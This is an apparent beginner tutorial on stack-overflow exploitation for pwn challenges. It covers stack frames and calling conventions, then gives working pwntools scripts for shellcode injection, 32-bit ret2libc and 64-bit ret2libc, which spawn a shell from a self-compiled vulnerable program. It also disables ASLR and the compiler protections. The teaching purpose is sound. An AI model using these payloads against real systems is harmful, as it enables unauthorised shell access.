Re:Learning pwn from scratch (stack overflow chapter)

Foreword: This article aims to help newcomers to pwn challenges avoid some detours and get started quickly. The content is fairly basic, so experts, please go easy on me. The article assumes that the reader understands the most basic assembly instructions, has a 64-bit Linux environment set up, and knows basic Linux commands.

Stacks, Stack Frames and Function Calls

As we know, among data structures, a stack is a last-in, first-out (LIFO) structure. In an operating system, the stack is generally used to save the state of functions and their local variables.
On Linux, the stack sits near the high end of the program's address space and grows from high addresses toward low addresses.

A stack frame is the region of stack space that independently stores a function's state and variables while that function is being called. Each function call gets its own stack frame; when the same function is called multiple times, each call may be given a different frame.

The stack frame of the running function is bounded by the stack base register (bp) and the stack pointer register (sp).

The picture above shows the stack frame structure of a subfunction at the time it is called (32-bit). The 64-bit case is basically the same, with some subtle differences that are mentioned later.

On 32-bit systems, a function call goes through the following steps:

Save the function's actual arguments
Store the return address to use when the subfunction ends
Save the parent function's stack frame information
Allocate stack space for local variables
Execute the function body
Free the local variable space used by the function
Restore the parent function's stack frame from the saved information
Resume the parent function's execution flow from the saved return address

Save the function's actual arguments
For func(a,b,c), the corresponding assembly instructions are:

push c
push b
push a

The arguments are pushed onto the stack from right to left.

Store the return address to use when the subfunction ends
At this point the assembly shows a call func instruction, which is functionally equivalent to:

push <address of the instruction following the call>
jmp func

The push saves the address of the instruction following the call onto the stack, so that when the subfunction finishes, the original execution flow can be resumed from the saved address.
The jmp then jumps to the address of the called function.

Save parent function stack frame information
We are now inside func, but esp and ebp still describe the parent function's stack frame.
Since esp returns to its pre-call value once the subfunction's stack space has been completely freed, only ebp needs to be saved, so the parent function's ebp is pushed onto the stack.

push ebp

Then set the base of the subfunction's stack frame to the current esp

mov ebp,esp

Allocate stack space for subfunctions

sub esp,20h

The above allocates 32 bytes (0x20) of space for the subfunction. Because the stack grows from high addresses to low addresses, the allocation is done by subtracting from esp.

Reclaiming stack space after a subfunction finishes executing

add esp,20h

Restore parent function stack frame
At this point esp is back where it was right after the parent function's ebp was pushed, so popping restores the parent function's ebp, and with it the parent's stack frame

pop ebp

Restore program execution flow

Finally, the current top of the stack is the return address, and the parent function stack information has been recovered, so it is sufficient to modify the program execution flow according to the return address stored on the stack. The corresponding assembly statement is:

retn

This is the entire process of creating and destroying a function stack frame in a 32-bit host.
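To make the sequence concrete, here is a toy simulation of the same steps. It is only a sketch: memory is modelled as a dictionary of 4-byte slots, and the register values and return address are made up.

```python
# Toy model of a 32-bit call: memory is a dict of 4-byte slots keyed by address.
mem = {}
regs = {"esp": 0xFFFFD000, "ebp": 0xFFFFD040}  # made-up starting values

def push(value):
    regs["esp"] -= 4  # the stack grows toward lower addresses
    mem[regs["esp"]] = value

def pop():
    value = mem[regs["esp"]]
    regs["esp"] += 4
    return value

parent_ebp = regs["ebp"]
esp_before_call = regs["esp"]
RETURN_ADDR = 0x08049200  # hypothetical address of the instruction after `call func`

# Caller: push the arguments right to left, then `call func` pushes the return address.
for arg in (3, 2, 1):  # func(1, 2, 3)
    push(arg)
push(RETURN_ADDR)

# Callee prologue: push ebp; mov ebp,esp; sub esp,20h
push(regs["ebp"])
regs["ebp"] = regs["esp"]
regs["esp"] -= 0x20

# Inside func: the return address is at [ebp+4], the first argument at [ebp+8].
saved_ret = mem[regs["ebp"] + 4]
first_arg = mem[regs["ebp"] + 8]

# Callee epilogue: add esp,20h; pop ebp; retn
regs["esp"] += 0x20
regs["ebp"] = pop()
eip = pop()

print(hex(eip), first_arg, hex(regs["ebp"]))
```

After the epilogue, ebp is back to the parent's value and execution resumes at the saved return address. The three arguments are still on the stack at this point, since removing them is left to the caller in this model.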

In the calling convention followed by most 64-bit Linux programs, by contrast, parameters are passed through registers. Only when there are more than 6 parameters are the extra ones passed on the stack. The correspondence between registers and parameters is as follows:

Register	Argument
rdi	first
rsi	second
rdx	third
rcx	fourth
r8	fifth
r9	sixth
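As a quick illustration of the rule, the following sketch splits a list of integer or pointer arguments into the ones that travel in registers and the ones that spill onto the stack. The function name `place_arguments` is made up for the example, and floating-point arguments, which use a different set of registers, are not modelled.

```python
INT_ARG_REGS = ["rdi", "rsi", "rdx", "rcx", "r8", "r9"]

def place_arguments(args):
    """Return (register assignments, stack arguments) for integer/pointer arguments."""
    in_regs = dict(zip(INT_ARG_REGS, args))       # the first six go into registers
    on_stack = list(args[len(INT_ARG_REGS):])     # anything beyond that goes on the stack
    return in_regs, on_stack

regs, stack = place_arguments([10, 20, 30, 40, 50, 60, 70, 80])
print(regs)
print(stack)
```

For a call such as system("/bin/sh"), which takes a single argument, only rdi matters, which is why the 64-bit question later only needs to control that one register.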

Hands-on practice

With the theory above in place, we can work through three simple pwn problems to understand how a stack overflow is exploited from start to finish.

Source program

#include <stdio.h>
#include <unistd.h>  /* read() and write() */
void vuln()
{
    char buf[128];
    read(0,buf,256);
}
int main()
{
    vuln();
    write(1,"hello rop\n",10);
}

By analyzing the source code, we can see that the program has an obvious stack overflow vulnerability: the array is 128 bytes in size, but read() allows up to 256 bytes to be written into it.

A stack overflow is a situation where user input exceeds the stack space allocated for it, so that the excess spills over and overwrites other data, such as key variables and return addresses. Through a stack overflow vulnerability, we can modify the program's execution flow.

Above is the stack overflow schematic. The user's input is longer than 12 bytes, so, going from low addresses to high addresses, it overwrites the char* bar, the saved stack base address of the parent function, and the return address, which can thereby be set to a value of our choosing.
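The overwrite described above can be reproduced without any real binary. The following is a minimal sketch that models the frame from the schematic as a byte array; the pointer values and the helper `unchecked_copy` are made up for illustration.

```python
import struct

BUF_SIZE = 12
# Frame layout from low to high address: buf[12] | char *bar | saved ebp | return address
frame = bytearray(BUF_SIZE + 4 + 4 + 4)
# Made-up original values for bar, saved ebp and the return address
struct.pack_into("<III", frame, BUF_SIZE, 0x0804A010, 0xFFFFD048, 0x08049213)

def unchecked_copy(frame, data):
    """Copy data to the start of the buffer with no bounds check."""
    frame[0:len(data)] = data

# 12 bytes fill the buffer; everything after that lands on the neighbouring fields.
user_input = b"A" * BUF_SIZE + b"B" * 4 + b"C" * 4 + struct.pack("<I", 0xDEADBEEF)
unchecked_copy(frame, user_input)

bar, saved_ebp, ret_addr = struct.unpack_from("<III", frame, BUF_SIZE)
print(hex(bar), hex(saved_ebp), hex(ret_addr))
```

After the copy, the return address slot holds the attacker-chosen value, which is exactly what the function will jump to when it returns.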

Functions commonly associated with stack overflow vulnerabilities are referred to as dangerous functions. Common ones include:
gets(), scanf(), sprintf(), strcpy(), strcat(), read(), etc. Consider a stack overflow whenever you encounter these functions.

For debugging we use a Python library, pwntools. Writing scripts with pwntools greatly simplifies the pwn process.

Create and activate a Python virtual environment (recommended)

python -m venv .venv
source .venv/bin/activate

Install pwntools

pip install pwntools

Test if the installation was successful

python
from pwn import *

If no error is reported, the installation is complete

Question 1 - Executing shellcode on the stack to achieve program flow hijacking

In all three of the following questions, the goal is to get a shell on the system. The experimental environment is Ubuntu 24.10.

In the first question, our goal is to write our shellcode directly to the stack and overwrite the return address of the function with the address of the shellcode, thus enabling the execution of the shellcode.

The schematic diagram is shown below:

However, modern operating systems generally mark the stack as non-executable (NX), which prevents shellcode on the stack from running, and compilers insert stack canaries by default. For this question we therefore disable both at compile time, and we also turn off address space layout randomization (ASLR) on the system.

Compile the program as a 32-bit binary with these protections turned off

gcc rop.c -o rop1 -m32 -fno-stack-protector -z execstack

The -m32 option produces a 32-bit binary, -fno-stack-protector turns off the stack canary, and -z execstack makes the stack executable so that shellcode on it can run. Here rop.c is only a placeholder name for the file containing the source program above.

Turn off system-wide address randomization (ASLR). Writing 0 disables it; 2, the usual default, enables full randomization.

su -
echo 0 | tee /proc/sys/kernel/randomize_va_space
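Before debugging it can help to confirm which ASLR mode is actually in effect. The snippet below is a small sketch that reads the same kernel setting and describes it; the function name `describe_aslr` is an illustrative choice, and the descriptions are a short paraphrase of the kernel's meaning for each value.

```python
from pathlib import Path

ASLR_MODES = {
    0: "disabled",
    1: "stack, mmap base and vDSO randomized",
    2: "same as 1, plus the heap (brk)",
}

def describe_aslr(raw):
    """Translate the content of randomize_va_space into a short description."""
    return ASLR_MODES.get(int(raw.strip()), "unknown")

setting = Path("/proc/sys/kernel/randomize_va_space")
if setting.exists():  # only present on Linux
    print(describe_aslr(setting.read_text()))
```

For the questions in this article the output should read "disabled".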

Using the checksec tool provided by pwntools, we can check the protection of the file:

checksec rop1

The result of the execution is similar to the one shown below:

A brief description of what some of these parameters mean:

Arch: the architecture of the program, in this case i386-32-little, meaning the program is 32-bit and stores data in little-endian byte order
stack-canary: a protection mechanism against stack overflow. When the function starts executing, a word-sized random value is written just below the saved frame pointer and return address. Before the function returns, the value is checked; if it has changed, the stack has been overflowed and the program is terminated immediately.
NX: with NX protection turned on, memory that is writable (where shellcode could be placed) is not executable, and memory that is executable is not writable. It is turned off here.
PIE: randomizes the load address of the executable itself. Leaving it on does not affect this question.
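The canary check in particular is easy to picture with a toy model. This is a rough sketch, not how the compiler implements it: the frame layout, the fixed canary value, and the function `run_vulnerable` are all assumptions made for the illustration (a real canary is chosen randomly for each process).

```python
import struct

BUF_SIZE = 16
CANARY = 0x5A17C300  # made-up value standing in for the random canary

def run_vulnerable(data):
    """Simulate a frame laid out as buf | canary | saved ebp | return address."""
    frame = bytearray(BUF_SIZE) + struct.pack("<III", CANARY, 0xFFFFD048, 0x08049213)
    frame[0:len(data)] = data  # unchecked copy into buf
    (canary_now,) = struct.unpack_from("<I", frame, BUF_SIZE)
    # The check happens just before the function would return.
    if canary_now != CANARY:
        return "stack smashing detected"
    return "returned normally"

print(run_vulnerable(b"A" * BUF_SIZE))               # input fits in the buffer
print(run_vulnerable(b"A" * BUF_SIZE + b"B" * 12))   # input runs over the canary
```

Because the canary sits between the buffer and the return address, a linear overflow cannot reach the return address without changing it, which is why the questions here compile with the canary disabled.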

With the above preparation, we can start working on the questions.

From the source code, we know that the array that overflows is inside the vuln function, so we set a breakpoint there and disassemble vuln

gdb rop1

In gdb, run:

b vuln
r
disass vuln

From the assembly code, we get the offset of the array: it starts at [ebp-0x88]. That is the amount of space set aside between the start of the array and ebp, and input longer than that overwrites what lies above it.

From the schematic above, note that to reach the return address we need, in addition to the array offset, another ebp-sized offset (4 bytes) that overwrites the saved ebp of the parent function. Only after that can we overwrite the return address with our own.

So, we construct the inputs like this:

payload = 0x88*b'a'+0x4*b'b'+return_addr

Note that what we pass in must be of type bytes, i.e. the payload is built as a stream of bytes; mixing in ordinary strings raises an error.
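To see what the payload looks like at the byte level, here is a sketch that uses only the standard library. The helper `pack32` is a stand-in for pwntools' `p32()` (4 bytes, little-endian), and 0xDEADBEEF is a placeholder rather than a real address.

```python
import struct

def pack32(value):
    """Stand-in for pwntools' p32(): encode a 32-bit value as 4 little-endian bytes."""
    return struct.pack("<I", value)

return_addr = pack32(0xDEADBEEF)  # placeholder, not a real address
payload = 0x88 * b"a" + 0x4 * b"b" + return_addr

print(len(payload))       # array offset + saved ebp + return address
print(return_addr.hex())  # the lowest-order byte comes first

# Mixing str and bytes is the error the text warns about.
try:
    "a" * 0x88 + return_addr
    mixing_works = True
except TypeError:
    mixing_works = False
print(mixing_works)
```

The little-endian order matters: the address has to appear in memory in the same byte order the CPU uses when it loads the return address.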

The return address points to a shellcode that can call the system shell, which we can generate with the help of pwntools.

shellcode = asm(shellcraft.sh())

With the above in mind, we write the script. At this point we do not yet know the address of the shellcode, so we first trigger a crash and then make observations:

from pwn import *
p = process('./rop1')
gdb.attach(p, 'b vuln')
shellcode = asm(shellcraft.sh())
shellcode_addr = 0xdeadbeef # not sure for now
# The shellcode sits at the start of the array and is padded to 0x88 bytes
payload = shellcode.ljust(0x88, b'a') + b'b' * 0x4 + p32(shellcode_addr)
p.send(payload)
p.interactive() # Enter interactive mode

At this point the program crashes and a core file containing information about the crash is generated in the current directory (or maybe not, depending on your system settings; search for how to enable core files after a program crash).

The stack frame after a program crash looks like this:

When the function finishes, its stack frame is released and esp points to the top of the parent function's stack. The shellcode placed at the start of the array is therefore 0x88 (the array offset) + 0x4*2 (the saved ebp and the return address) = 0x90 bytes below esp.

To test this, we load the core file in gdb and look at the state at the moment rop1 crashed (replace core with the actual name of your core file)

gdb rop1 core

In gdb, look at the contents of the address at esp-0x90

x/s $esp-0x90

The string beginning with jhh is the generated shellcode that opens the shell (you can verify this yourself)

The $esp-0x90 is the address of the shellcode we need. Record that address and populate the script with it
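The 0x90 figure is just the sum of the three pieces that sit between the start of the array and the position of esp after the return. As a quick sanity check, the arithmetic can be written out; the esp value used here is hypothetical and should be replaced with the one from your own core file.

```python
BUF_OFFSET = 0x88   # the array starts at [ebp-0x88]
SAVED_EBP = 0x4     # the parent's ebp saved by `push ebp`
RET_ADDR = 0x4      # the return address consumed by `retn`

def shellcode_address(esp_at_crash):
    """Start of the array, given esp right after vuln has returned."""
    return esp_at_crash - (BUF_OFFSET + SAVED_EBP + RET_ADDR)

esp_at_crash = 0xFFFFCF60  # hypothetical value read from the core file
print(hex(shellcode_address(esp_at_crash)))
```

Because ASLR is off, this address stays the same from run to run as long as the program is started the same way.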

Refine the script to get the shell successfully:

from pwn import *
p = process('./rop1')
shellcode = asm(shellcraft.sh())
shellcode_addr = your_addr # replace with the address recorded from gdb
payload = shellcode.ljust(0x88, b'a') + b'b' * 0x4 + p32(shellcode_addr)
p.send(payload)
p.interactive() # Enter interactive mode

Question 2 - Hijacking Program Flow with ret2libc (32-bit)

Compile the program with the following parameters (rop.c is a placeholder for the file holding the source program):

gcc rop.c -o rop2 -m32 -fno-stack-protector

Compared with Question 1, the second question has NX (No eXecute) protection turned on, which prevents direct execution of shellcode on the stack.

If we cannot run shellcode directly, is there another way? Yes. A running program almost inevitably references external shared libraries, and a common one is libc (the standard C library), which provides a set of key functions on GNU/Linux. We can get around the restriction by redirecting the program's execution flow to functions that libc already provides.

As shown in the figure, we overwrite the original return address of the subfunction with the address of the function in the libc library, and the subfunction will jump to the corresponding function location after execution.

The ldd command allows us to view the shared libraries used by the file:

ldd rop2

Here we choose system as the libc function, with /bin/sh as its argument. The return address used when system finishes does not matter, because by executing system we have already obtained the shell.

Since we have turned off ASLR for this question, the addresses of the system function and the /bin/sh string in memory do not change once the program starts executing, and you can look both up directly in gdb after you start debugging:

Outputs the address of the system function:

p system

With vmmap (a command provided by gdb plugins such as pwndbg), we look at the current memory mapping in gdb, determine the start and end addresses of libc in memory, and then search that range for the /bin/sh string

vmmap

Here the start address is 0xf7ccb000 and the end address is 0xf7ef4000.

Use the find command to locate the "/bin/sh" string in the libc library:

find 0xf7ccb000,0xf7ef4000,"/bin/sh"

The address in the result is the one we need.

With the destination addresses clear, we next need to determine the offset, again by disassembling the vuln function:

The array size is 0x88, and an ebp size of 0x4 is added to overwrite the parent function stack frame, giving a final offset of 0x8c.

With the above preparation, we write the following script, which also attaches gdb to the process:

from pwn import *

p = process('./rop2')
gdb.attach(p, 'b main')

sys_addr = int(input("Enter the address of the system function: "), 16)
binsh_addr = int(input("Enter the address of the /bin/sh string in libc: "), 16)
# The return address of system (0xdeadbeef) is not important
payload = b'a' * 0x8c + p32(sys_addr) + p32(0xdeadbeef) + p32(binsh_addr)
p.send(payload)
p.interactive() # Enter interactive mode

Fill in the address you get, and you'll get the shell.
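The order of the three words after the padding follows directly from the 32-bit calling convention: when system starts running, it expects its own return address at the top of the stack and its first argument right above that. The sketch below rebuilds the layout with the standard library and reads it back; the function name `ret2libc32` and both addresses are made up for the illustration.

```python
import struct

def ret2libc32(offset, system_addr, binsh_addr, fake_ret=0xDEADBEEF):
    """padding | address of system | return address for system | first argument"""
    padding = b"a" * offset
    return padding + struct.pack("<III", system_addr, fake_ret, binsh_addr)

payload = ret2libc32(0x8C, 0xF7D0A000, 0xF7E5B0D5)  # made-up addresses

# Read the chain back the way the CPU will see it after the padding.
target, ret_after_system, first_arg = struct.unpack_from("<III", payload, 0x8C)
print(hex(target), hex(ret_after_system), hex(first_arg))
```

If the placeholder in the middle were left out, system would treat the address of /bin/sh as its return address and read its argument from whatever follows on the stack.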

Question 3 - ret2libc (64-bit)

Compile the program with the following parameters (rop.c is a placeholder for the file holding the source program)

gcc rop.c -o rop3 -m64 -fno-stack-protector

As a refresher, exploiting libc on 64-bit differs from 32-bit because the calling convention is different: 64-bit programs pass parameters through specific registers, and only when there are more than 6 parameters are the extra ones passed on the stack.

Parameters correspond to registers:

To pass a parameter through a register, we need to find specific small code snippets (gadgets) that pop a value from the stack into a register, so that the parameter ends up in that register. In this example, the only parameter we need to pass is /bin/sh, so we can look for a gadget like pop rdi; ret.

The schematic diagram is shown below:

First we need to look at the shared libraries used by rop3:

ldd rop3

As you can see, libc.so.6 is used, which is exactly the libc we need.

Use the ROPgadget tool, which is installed together with pwntools, to find the gadget we need in that library

ROPgadget --binary /lib/x86_64-linux-gnu/libc.so.6 --only "pop|ret" | grep rdi

This displays the matching gadgets together with their offsets relative to the start of the file.

0x000000000002a44e : pop rdi ; pop rbp ; ret
0x000000000002a255 : pop rdi ; ret
0x0000000000129b4d : pop rdi ; ret 0xfff2
0x00000000000f4d6d : pop rdi ; ret 0xffff
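These values are offsets inside the library, not addresses in the running process. A minimal sketch of the conversion, assuming a hypothetical libc base address (read the real one from vmmap in your own session):

```python
POP_RDI_RET_OFFSET = 0x2A255  # `pop rdi ; ret` offset from the ROPgadget listing

def runtime_address(libc_base, offset):
    """Address of a gadget once libc is mapped at libc_base."""
    return libc_base + offset

libc_base = 0x7FFFF7C00000  # hypothetical base address of libc in the process
print(hex(runtime_address(libc_base, POP_RDI_RET_OFFSET)))
```

The plain `pop rdi ; ret` entry is the convenient one to use: the `ret 0xfff2` style variants also add their operand to rsp when they return, which would move the stack pointer far away from the rest of the chain.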

The parameter addresses and system function addresses are obtained in the same way as for the 32-bit ones and will not be repeated here.

Regarding the offsets, note that the 64-bit offsets are not identical to the 32-bit ones and need to be recalculated by disassembling the vuln function again:

Here, the array offset is 0x80, in order to cover the return address, it is also necessary to add a rbp size, i.e. 0x8, so the total offset is 0x88

With the above information, you can start writing the script:

from pwn import *
p = process('./rop3')
gdb.attach(p, 'b main')
sys_addr = int(input("Input the address of the system function: "), 16)
binsh_addr = int(input("Input the address of the string /bin/sh: "), 16)
pr_addr = int(input("Input the address of the gadget: "), 16)
# pop rdi ; ret loads /bin/sh into rdi, then returns into system
payload = b'a' * 0x80 + b'b' * 0x8 + p64(pr_addr) + p64(binsh_addr) + p64(sys_addr) + p64(0xdeadbeef)
p.send(payload)
p.interactive()

Execute the script. It may fail at this point. There is a detail involved here: the calling convention used by mainstream compilers on 64-bit systems requires stack alignment, that is, the stack pointer rsp must be a multiple of 16 at the moment a function is called. Our chain enters system through ret instead of call, so rsp can be off by 8 bytes, and system then typically crashes on an instruction that expects aligned stack data.

Once we know why, the fix is to shift the stack pointer by 8 bytes before system is entered so that the alignment holds. Usually we do this by inserting an extra ret gadget into the chain.
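The effect of the extra ret can be checked with simple arithmetic. The sketch below assumes that vuln itself was entered through a normal call, so the slot holding its return address sits at an address that is 8 modulo 16; the concrete address and the helper names are made up.

```python
RET_SLOT = 0x7FFFFFFFE0C8  # hypothetical address of vuln's saved return address (8 mod 16)

def rsp_when_entering_last(chain, ret_slot=RET_SLOT):
    """rsp at the first instruction of the last entry in the chain.

    Every word up to and including the target's address is consumed by a
    `ret` or a `pop`, and each of those moves rsp up by 8 bytes.
    """
    return ret_slot + 8 * len(chain)

def looks_like_normal_call(rsp):
    # Right after a real `call`, rsp is 8 modulo 16 because the return address was just pushed.
    return rsp % 16 == 8

plain = ["pop rdi ; ret", "/bin/sh", "system"]
padded = ["ret", "pop rdi ; ret", "/bin/sh", "system"]

print(looks_like_normal_call(rsp_when_entering_last(plain)))
print(looks_like_normal_call(rsp_when_entering_last(padded)))
```

The first chain enters system with rsp at a multiple of 16, which is 8 bytes away from what a real call would produce; the chain with the extra ret restores the expected state.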

Look for ret in libc.so.6

ROPgadget --binary /lib/x86_64-linux-gnu/libc.so.6 --only 'ret' | grep ret

The modified script is as follows:

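from pwn import *

p = process('./rop3')
gdb.attach(p, 'b main')
system_addr = int(input("Enter the address of the system function: "), 16)
binsh_addr = int(input("Enter the address of the '/bin/sh' string in libc.so.6: "), 16)

# Offsets found with ROPgadget in the author's libc.so.6; replace them with the values for your library
offset1 = 0x000000000011903c  # pop rdi ; ret
gadget_start_addr = int(input("Enter the start address of libc.so.6: "), 16)
gadget_addr = gadget_start_addr + offset1

offset2 = 0x0000000000028a93  # ret
ret_addr = gadget_start_addr + offset2

# The extra ret comes first to realign the stack; /bin/sh must directly follow pop rdi ; ret so that it is popped into rdi
payload = b'a' * 0x80 + b'b' * 0x8 + p64(ret_addr) + p64(gadget_addr) + p64(binsh_addr) + p64(system_addr) + p64(0xdeadbeef)
p.send(payload)
p.interactive()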

That is all. If there are any omissions or mistakes, please point them out. Hopefully this helps those who are interested in pwn avoid a few detours!